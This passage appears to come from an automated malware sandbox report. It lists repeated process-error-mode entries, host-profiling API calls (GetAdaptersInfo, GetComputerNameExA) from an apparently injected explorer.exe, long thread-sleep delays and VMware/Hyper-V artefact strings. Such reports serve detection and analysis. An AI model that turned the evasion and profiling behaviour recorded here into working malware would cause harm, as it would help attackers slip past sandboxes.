                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,22_2_013A5904
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,22_2_013A6984
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,22_2_013ADDF8
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 5001Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 4879Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 468Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8936Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 694Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 672Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 2.5 %
                      Source: C:\Windows\System32\loaddll64.exe TID: 6660Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep count: 5001 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep time: -300060000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep count: 4879 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep time: -292740000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 7704Thread sleep time: -224000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 7728Thread sleep time: -46800s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 7704Thread sleep time: -8936000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B8 FindFirstFileExW,6_2_00000001800192B8
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,22_2_013A8BA8
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,22_2_013A1A08
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADCE0 FindFirstFileW,22_2_013ADCE0
                      Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                      Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
